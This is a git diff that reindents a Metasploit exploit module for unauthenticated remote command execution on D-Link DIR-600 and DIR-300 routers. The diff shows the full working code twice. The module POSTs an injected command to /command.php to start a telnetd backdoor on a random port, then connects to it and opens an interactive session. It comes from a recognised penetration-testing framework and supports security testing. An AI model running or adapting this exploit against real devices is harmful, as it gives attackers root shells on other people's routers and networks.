sempervictus
diff --git a/‎modules/exploits/linux/http/dlink_command_php_exec_noauth.rb
Lines changed: 141 additions & 141 deletions b/‎modules/exploits/linux/http/dlink_command_php_exec_noauth.rb
Lines changed: 141 additions & 141 deletions
@@ -8,146 +8,146 @@
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
-	Rank = ExcellentRanking
-
-	include Msf::Exploit::Remote::HttpClient
-
-	def initialize(info = {})
-		super(update_info(info,
-			'Name'        => 'D-Link Devices Unauthenticated Remote Command Execution',
-			'Description' => %q{
-				Different D-Link Routers are vulnerable to OS command injection via the web
-				interface. The vulnerability exists in command.php, which is accessible without
-				authentication. This module has been tested with the versions DIR-600 2.14b01,
-				DIR-300 rev B 2.13.
-			},
-			'Author'      =>
-				[
-					'Michael Messner <[email protected]>', # Vulnerability discovery and Metasploit module
-					'juan vazquez' # minor help with msf module
-				],
-			'License'     => MSF_LICENSE,
-			'References'  =>
-				[
-					[ 'OSVDB', '89861' ],
-					[ 'EDB', '24453' ],
-					[ 'BID', '57734' ],
-					[ 'URL', 'http://www.dlink.com/uk/en/home-solutions/connect/routers/dir-600-wireless-n-150-home-router' ],
-					[ 'URL', 'http://www.s3cur1ty.de/home-network-horror-days' ],
-					[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-003' ]
-				],
-			'DisclosureDate' => 'Feb 04 2013',
-			'Privileged'     => true,
-			'Platform'       => 'unix',
-			'Arch'        => ARCH_CMD,
-			'Payload'     =>
-				{
-					'Compat'  => {
-						'PayloadType'    => 'cmd_interact',
-						'ConnectionType' => 'find',
-					},
-				},
-			'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
-			'Targets'        =>
-				[
-					[ 'Automatic',	{ } ]
-				],
-			'DefaultTarget'  => 0
-			))
-
-		register_advanced_options(
-			[
-				OptInt.new('TelnetTimeout', [ true, 'The number of seconds to wait for a reply from a Telnet command', 10]),
-				OptInt.new('TelnetBannerTimeout', [ true, 'The number of seconds to wait for the initial banner', 25]),
-				OptInt.new('SessionTimeout', [ true, 'The number of seconds to wait before building the session on the telnet connection', 10])
-			], self.class)
-
-	end
-
-	def tel_timeout
-		(datastore['TelnetTimeout'] || 10).to_i
-	end
-
-	def banner_timeout
-		(datastore['TelnetBannerTimeout'] || 25).to_i
-	end
-
-	def session_timeout
-		(datastore['SessionTimeout'] || 10).to_i
-	end
-
-	def exploit
-		telnetport = rand(65535)
-
-		print_status("#{rhost}:#{rport} - Telnet port used: #{telnetport}")
-
-		cmd = "telnetd -p #{telnetport}"
-
-		#starting the telnetd gives no response
-		print_status("#{rhost}:#{rport} - Sending exploit request...")
-		request(cmd)
-
-		print_status("#{rhost}:#{rport} - Trying to establish a telnet connection...")
-		sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })
-
-		if sock.nil?
-			fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
-		end
-
-		print_status("#{rhost}:#{rport} - Trying to establish a telnet session...")
-		prompt = negotiate_telnet(sock)
-		if prompt.nil?
-			sock.close
-			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to establish a telnet session")
-		else
-			print_good("#{rhost}:#{rport} - Telnet session successfully established... trying to connect")
-		end
-
-		print_status("#{rhost}:#{rport} - Trying to create the Msf session...")
-		begin
-			Timeout.timeout(session_timeout) do
-				activated = handler(sock)
-				while(activated !~ /claimed/)
-					activated = handler(sock)
-				end
-			end
-		rescue ::Timeout::Error
-			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to establish a Msf session")
-		end
-	end
-
-	def request(cmd)
-
-		uri = '/command.php'
-
-		begin
-			res = send_request_cgi({
-				'uri'    => uri,
-				'method' => 'POST',
-				'vars_post' => {
-					"cmd" => cmd
-					}
-			})
-		return res
-		rescue ::Rex::ConnectionError
-			fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Could not connect to the webservice")
-		end
-	end
-
-	def negotiate_telnet(sock)
-		begin
-			Timeout.timeout(banner_timeout) do
-				while(true)
-					data = sock.get_once(-1, tel_timeout)
-					return nil if not data or data.length == 0
-					if data =~ /\x23\x20$/
-						return true
-					end
-				end
-			end
-		rescue ::Timeout::Error
-			return nil
-		end
-	end
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'D-Link Devices Unauthenticated Remote Command Execution',
+      'Description' => %q{
+        Different D-Link Routers are vulnerable to OS command injection via the web
+        interface. The vulnerability exists in command.php, which is accessible without
+        authentication. This module has been tested with the versions DIR-600 2.14b01,
+        DIR-300 rev B 2.13.
+      },
+      'Author'      =>
+        [
+          'Michael Messner <[email protected]>', # Vulnerability discovery and Metasploit module
+          'juan vazquez' # minor help with msf module
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          [ 'OSVDB', '89861' ],
+          [ 'EDB', '24453' ],
+          [ 'BID', '57734' ],
+          [ 'URL', 'http://www.dlink.com/uk/en/home-solutions/connect/routers/dir-600-wireless-n-150-home-router' ],
+          [ 'URL', 'http://www.s3cur1ty.de/home-network-horror-days' ],
+          [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-003' ]
+        ],
+      'DisclosureDate' => 'Feb 04 2013',
+      'Privileged'     => true,
+      'Platform'       => 'unix',
+      'Arch'        => ARCH_CMD,
+      'Payload'     =>
+        {
+          'Compat'  => {
+            'PayloadType'    => 'cmd_interact',
+            'ConnectionType' => 'find',
+          },
+        },
+      'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
+      'Targets'        =>
+        [
+          [ 'Automatic',	{ } ]
+        ],
+      'DefaultTarget'  => 0
+      ))
+
+    register_advanced_options(
+      [
+        OptInt.new('TelnetTimeout', [ true, 'The number of seconds to wait for a reply from a Telnet command', 10]),
+        OptInt.new('TelnetBannerTimeout', [ true, 'The number of seconds to wait for the initial banner', 25]),
+        OptInt.new('SessionTimeout', [ true, 'The number of seconds to wait before building the session on the telnet connection', 10])
+      ], self.class)
+
+  end
+
+  def tel_timeout
+    (datastore['TelnetTimeout'] || 10).to_i
+  end
+
+  def banner_timeout
+    (datastore['TelnetBannerTimeout'] || 25).to_i
+  end
+
+  def session_timeout
+    (datastore['SessionTimeout'] || 10).to_i
+  end
+
+  def exploit
+    telnetport = rand(65535)
+
+    print_status("#{rhost}:#{rport} - Telnet port used: #{telnetport}")
+
+    cmd = "telnetd -p #{telnetport}"
+
+    #starting the telnetd gives no response
+    print_status("#{rhost}:#{rport} - Sending exploit request...")
+    request(cmd)
+
+    print_status("#{rhost}:#{rport} - Trying to establish a telnet connection...")
+    sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })
+
+    if sock.nil?
+      fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
+    end
+
+    print_status("#{rhost}:#{rport} - Trying to establish a telnet session...")
+    prompt = negotiate_telnet(sock)
+    if prompt.nil?
+      sock.close
+      fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to establish a telnet session")
+    else
+      print_good("#{rhost}:#{rport} - Telnet session successfully established... trying to connect")
+    end
+
+    print_status("#{rhost}:#{rport} - Trying to create the Msf session...")
+    begin
+      Timeout.timeout(session_timeout) do
+        activated = handler(sock)
+        while(activated !~ /claimed/)
+          activated = handler(sock)
+        end
+      end
+    rescue ::Timeout::Error
+      fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to establish a Msf session")
+    end
+  end
+
+  def request(cmd)
+
+    uri = '/command.php'
+
+    begin
+      res = send_request_cgi({
+        'uri'    => uri,
+        'method' => 'POST',
+        'vars_post' => {
+          "cmd" => cmd
+          }
+      })
+    return res
+    rescue ::Rex::ConnectionError
+      fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Could not connect to the webservice")
+    end
+  end
+
+  def negotiate_telnet(sock)
+    begin
+      Timeout.timeout(banner_timeout) do
+        while(true)
+          data = sock.get_once(-1, tel_timeout)
+          return nil if not data or data.length == 0
+          if data =~ /\x23\x20$/
+            return true
+          end
+        end
+      end
+    rescue ::Timeout::Error
+      return nil
+    end
+  end
 
 end